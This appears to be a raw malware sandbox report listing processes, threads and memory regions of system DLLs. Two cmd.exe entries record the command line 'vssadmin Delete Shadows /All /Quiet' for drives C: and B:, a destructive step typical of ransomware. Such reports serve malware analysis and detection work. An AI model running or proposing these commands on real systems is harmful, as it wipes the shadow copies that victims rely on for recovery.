	        start_va = 0x49b0000
	          end_va = 0x4a99fff
	       monitored = 0
	     entry_point = 0x49ed650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 5949
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")


Thread:
	id = 422
	os_tid = 0xfb4


Thread:
	id = 427
	os_tid = 0x5b8


Process:
	id = "80"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x29b93000"
	os_pid = "0x12e0"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=C: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 5831
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 5832
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 5833
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 5834
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 5835
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 5836
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 5837
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 5838
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 5839
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 5840
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 5841
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 5842
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 5843
	        start_va = 0x7f030000
	          end_va = 0x7f052fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f030000"
	        filename = ""

Region:
	              id = 5844
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 5845
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 5846
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 5847
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 5848
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 5856
	        start_va = 0x1c0000
	          end_va = 0x26ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 5860
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 5861
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 5862
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 5863
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 5864
	        start_va = 0x4600000
	          end_va = 0x486ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 5867
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 5868
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 5876
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 5877
	        start_va = 0x7ef30000
	          end_va = 0x7f02ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ef30000"
	        filename = ""


Thread:
	id = 423
	os_tid = 0x480


Process:
	id = "81"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x29be5000"
	os_pid = "0xf80"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "80"
	os_parent_pid = "0x12e0"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 5887
	        start_va = 0xc000000
	          end_va = 0xc1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000000c000000"
	        filename = ""

Region:
	              id = 5888
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 5889
	        start_va = 0x4d4bef0000
	          end_va = 0x4d4bf2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000004d4bef0000"
	        filename = ""

Region:
	              id = 5890
	        start_va = 0x4d4c000000
	          end_va = 0x4d4c1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000004d4c000000"
	        filename = ""

Region:
	              id = 5891
	        start_va = 0x14d678b0000
	          end_va = 0x14d678cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000014d678b0000"
	        filename = ""

Region:
	              id = 5892
	        start_va = 0x14d678d0000
	          end_va = 0x14d678e4fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000014d678d0000"
	        filename = ""

Region:
	              id = 5893
	        start_va = 0x7df5ff370000
	          end_va = 0x7ff5ff36ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff370000"
	        filename = ""

Region:
	              id = 5894
	        start_va = 0x7ff7ff030000
	          end_va = 0x7ff7ff052fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff030000"
	        filename = ""

Region:
	              id = 5895
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 5896
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 5897
	        start_va = 0x14d678f0000
	          end_va = 0x14d67acffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000014d678f0000"
	        filename = ""

Region:
	              id = 5898
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 5904
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 5905
	        start_va = 0x14d678b0000
	          end_va = 0x14d678bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000014d678b0000"
	        filename = ""

Region:
	              id = 5906
	        start_va = 0x7ff7fef30000
	          end_va = 0x7ff7ff02ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7fef30000"
	        filename = ""

Region:
	              id = 5907
	        start_va = 0x14d678f0000
	          end_va = 0x14d679adfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 5908
	        start_va = 0x14d679d0000
	          end_va = 0x14d67acffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000014d679d0000"
	        filename = ""

Region:
	              id = 5919
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 5920
	        start_va = 0x4d4bf30000
	          end_va = 0x4d4bf6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000004d4bf30000"
	        filename = ""

Region:
	              id = 5921
	        start_va = 0x14d67ad0000
	          end_va = 0x14d67c1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000014d67ad0000"
	        filename = ""

Region:
	              id = 5922
	        start_va = 0x14d678c0000
	          end_va = 0x14d678c6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000014d678c0000"
	        filename = ""

Region:
	              id = 5923
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 5924
	        start_va = 0x14d679b0000
	          end_va = 0x14d679b0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000014d679b0000"
	        filename = ""

Region:
	              id = 5925
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 5934
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 5935
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 5936
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 5937
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 5938
	        start_va = 0x14d679c0000
	          end_va = 0x14d679c6fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000014d679c0000"
	        filename = ""

Region:
	              id = 5939
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 5945
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 5946
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 5947
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 5948
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 5950
	        start_va = 0x14d67ad0000
	          end_va = 0x14d67ad0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000014d67ad0000"
	        filename = ""

Region:
	              id = 5951
	        start_va = 0x14d67ae0000
	          end_va = 0x14d67ae0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000014d67ae0000"
	        filename = ""

Region:
	              id = 5952
	        start_va = 0x14d67c10000
	          end_va = 0x14d67c1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000014d67c10000"
	        filename = ""

Region:
	              id = 5953
	        start_va = 0x14d67c20000
	          end_va = 0x14d67da7fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000014d67c20000"
	        filename = ""

Region:
	              id = 5954
	        start_va = 0x14d67db0000
	          end_va = 0x14d67f30fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000014d67db0000"
	        filename = ""

Region:
	              id = 5955
	        start_va = 0x14d67f40000
	          end_va = 0x14d6933ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000014d67f40000"
	        filename = ""

Region:
	              id = 5956
	        start_va = 0x14d67af0000
	          end_va = 0x14d67beffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000014d67af0000"
	        filename = ""

Region:
	              id = 5957
	        start_va = 0x4d4bf70000
	          end_va = 0x4d4bfaffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000004d4bf70000"
	        filename = ""

Region:
	              id = 5958
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 5959
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 5960
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 5961
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 5962
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 5965
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 5966
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 5967
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 5968
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 5969
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 5974
	        start_va = 0x14d69340000
	          end_va = 0x14d6950ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000014d69340000"
	        filename = ""

Region:
	              id = 5978
	        start_va = 0x14d69510000
	          end_va = 0x14d69846fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 5979
	        start_va = 0x14d67af0000
	          end_va = 0x14d67b49fff
	       monitored = 1
	     entry_point = 0x14d67b053f0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")

Region:
	              id = 5980
	        start_va = 0x14d67b50000
	          end_va = 0x14d67b70fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "cmd.exe.mui"
	        filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui")

Region:
	              id = 5981
	        start_va = 0x14d67be0000
	          end_va = 0x14d67beffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000014d67be0000"
	        filename = ""


Thread:
	id = 426
	os_tid = 0xb68


Thread:
	id = 428
	os_tid = 0x10a8


Thread:
	id = 430
	os_tid = 0x39c


Process:
	id = "82"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x77dbb000"
	os_pid = "0x5f8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=B: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]